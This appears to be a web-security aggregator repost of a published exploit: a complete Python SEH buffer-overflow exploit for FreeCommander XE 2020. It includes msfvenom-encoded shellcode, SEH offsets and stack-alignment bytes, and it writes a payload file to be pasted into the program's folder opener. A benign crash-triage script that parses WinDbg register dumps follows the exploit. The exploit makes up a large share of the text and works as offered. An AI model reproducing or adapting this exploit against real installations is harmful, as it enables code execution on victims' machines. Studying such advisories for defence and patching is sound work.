HackDig : Dig high-quality web security articles for hackers


FreeCommander XE 2020 Pathname Buffer Overflow

2020-03-29 09:05
#!/usr/bin/python
# Exploit Title:    FreeCommander XE 2020 - Pathname Buffer Overflow (SEH)
# Version:          Build 810a 32-bit
# Software Link:    https://freecommander.com/downloads/FreeCommanderXE-32-public_setup.zip
# Date:             2020-03-28
# Exploit Author:   Hodorsec (hodor@hodorsec.com / hodorsec@protonmail.com)
# Vendor Homepage:  https://www.freecommander.com
# Tested on:        Win8.1 x64 - Build 9600
# Description:
# - Exploits the command / folder opener in the main window by entering an overly long string and pressing enter: a crash will occur and the Structured Exception Handler kicks in (SEH overflown).
# - Some stack alignment was required, which eventually led to the ability of running shellcode.
# Reproduction:
# - Use indicated OS or manipulate settings for stack alignment: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy and paste the output in the command / folder opener of FreeCommander
# - Check results
# WinDBG initial crash output:
# (db4.648): Access violation - code c0000005 (!!! second chance !!!)
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll -
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\FreeCommander XE\FreeCommander.exe -
# eax=00000000 ebx=00000000 ecx=00410041 edx=77e8ffaf esi=00000000 edi=00000000
# eip=00410041 esp=00091620 ebp=00091640 iopl=0         nv up ei pl zr na pe nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
# FreeCommander+0x10041:
# 00410041 0064005c        add     byte ptr [eax+eax+5Ch],ah  ds:002b:0000005c=??

import sys, struct

# Filename
filename = "win8_freecommander_poc.txt"

# Maximum length
maxlen = 2000

# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -b "\x00\x0a\x0d" bufferregister=eax
# Payload size: 512 bytes
shellcode = ("PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlzHTBypkPm0aP2ixep190bDTKnpP0bk0RJl4Kobn44KbRKxjoFW0Jo6p1KODlml1Q3LlBNLKpy1XOLMm1UwgrzR1Br7tKobzp2k0JmlDKNlJq2XySPHzaHQR1bkaImPIqWc2k0In8jCmjMyRknT2kzaZ6maIo4leq6ozmm1i7NX7pPul6JccMzXmk3MKtSEhdnxTKb8ldza6srFBklLPKbkqHMLKQhSbkM4dKIqVp1ymtmTldokokQQaIoj21yoK01OOoPZDKzrxkDM1MaZZa4M55UbM0ipkPr0S8nQRkROu7KOWeukHpTuFB1F2HvFBuWMuMio6umlM6CLZjQpIk7pRUlEWKa7mCsBrO1ZypR3ioxU0cS12LosnNpet80eM0AA")

# Offsets
seh = 522
nseh = seh - 2

# Venetian NOP
nop = "\x45"

# Aligning EBP with buffer
# ESP being closest to buffer
# ESP = 0018ecc4, Buffer = 0018fb5f: Buffer - ESP = 0x0e9b
align_esp = (   "\x54"              # PUSH ESP
                + nop +             # Padding
                "\x58"              # POP EAX
                + nop +             # Padding
                "\x05\x11\x11"      # "\x05\x00\x10\x00\x11" # 0500100011 add eax,0x11001000 --
                + nop +             # Padding                                                   |--> Adds 0x0f00 bytes
                "\x2d\x02\x11"      # "\x2d\x00\x01\x00\x11" # 2d00010011 sub eax,0x11000100 --/
                + nop +             # Padding
                "\x40"              # INC EAX # Added due to one-off unicode byte
                + nop +             # Padding
                "\x50"              # PUSH EAX
                + nop +             # Padding
                "\xc3"              # RET
)

# Prefix
prefix = "A" * seh                                              # Fill junk

# NSEH/SEH
nseh = "\x41\x45"                                               # NOP --> INC ECX # ADD [EBP], AL
seh = "\x71\x4c"                                                # POP POP RET

# Suffix
suffix = nop * 3                                                # Align
suffix += align_esp                                             # Align registers; EAX for executing shellcode
suffix += nop * 48                                              # Nopping until buffer
suffix += shellcode                                             # Do some magic
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix))    # Fill junk

# Concatenate string for payload
payload = prefix + nseh + seh + suffix                          # Put it all together

try:
    file = open(filename,"wb")
    file.write(payload)
    file.close()
    print "[+] File " + filename + " with size of " + str(len(payload)) + " created successfully"
except:
    print "[!] Error creating file!"
    sys.exit(0)
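The WinDbg dump quoted in the script header is the part of this advisory a responder is most likely to meet first: a crash report with eip=00410041 and ecx=00410041. The following is an added crash-triage helper, not part of the original advisory or of FreeCommander, that parses such a register dump and flags registers whose value decodes as printable UTF-16LE text (0x00410041 is "AA" as a wide string), which is the tell-tale sign that a wide-character copy of untrusted input has overwritten saved control data, including the SEH record. The sample dump is constructed from the register lines quoted above; the function and field names are this example's own.

```python
import re
from typing import Dict, Optional, List

# Constructed sample: the register lines from the WinDbg output quoted in the
# advisory header, in the standard layout WinDbg prints on a crash.
SAMPLE_CRASH = """\
(db4.648): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=00410041 edx=77e8ffaf esi=00000000 edi=00000000
eip=00410041 esp=00091620 ebp=00091640 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
"""

# 32-bit general-purpose registers as WinDbg prints them (name=8 hex digits).
REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[bs]p|eip)=([0-9a-fA-F]{8})")


def parse_registers(dump: str) -> Dict[str, int]:
    """Return {register: value} for every 32-bit register in a WinDbg-style dump."""
    return {name: int(val, 16) for name, val in REG_RE.findall(dump)}


def as_wide_text(value: int) -> Optional[str]:
    """If the 32-bit value decodes as two printable ASCII characters stored as
    UTF-16LE (e.g. 0x00410041 -> 'AA'), return that text; otherwise None.
    Little-endian byte order is used because the dump is from an x86 process."""
    raw = value.to_bytes(4, "little")
    try:
        text = raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None
    if all(0x20 <= ord(ch) < 0x7F for ch in text):
        return text
    return None


def triage(dump: str) -> Dict[str, object]:
    """Summarise why a crash deserves attention: which registers hold
    attacker-looking text and whether the instruction pointer is among them."""
    regs = parse_registers(dump)
    tainted: List[str] = []
    text_by_reg: Dict[str, str] = {}
    for name, value in regs.items():
        text = as_wide_text(value)
        if text is not None:
            tainted.append(name)
            text_by_reg[name] = text

    result: Dict[str, object] = {
        "access_violation": "c0000005" in dump.lower(),
        "second_chance": "second chance" in dump.lower(),
        "tainted_registers": tainted,
        "register_text": text_by_reg,
        "eip_controlled": "eip" in text_by_reg,
    }
    # A controlled EIP after an access violation is the strongest single
    # indicator that the overflow reached saved control data.
    result["verdict"] = (
        "probable control-flow hijack (input reached saved control data)"
        if result["eip_controlled"] else
        "crash with no obvious controlled control-flow register"
    )
    return result


if __name__ == "__main__":
    report = triage(SAMPLE_CRASH)
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run on the sample, the verdict is a probable control-flow hijack, because eip and ecx both decode as the wide string "AA" while esp, ebp and edx do not. The check is deliberately narrow: a register holding a pointer that happens to fall in the printable range would be a false positive, so treat the output as a triage hint that justifies a full debugger session, not as proof on its own.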


Source: cxsecurity.com/issue/WLB-2020030161

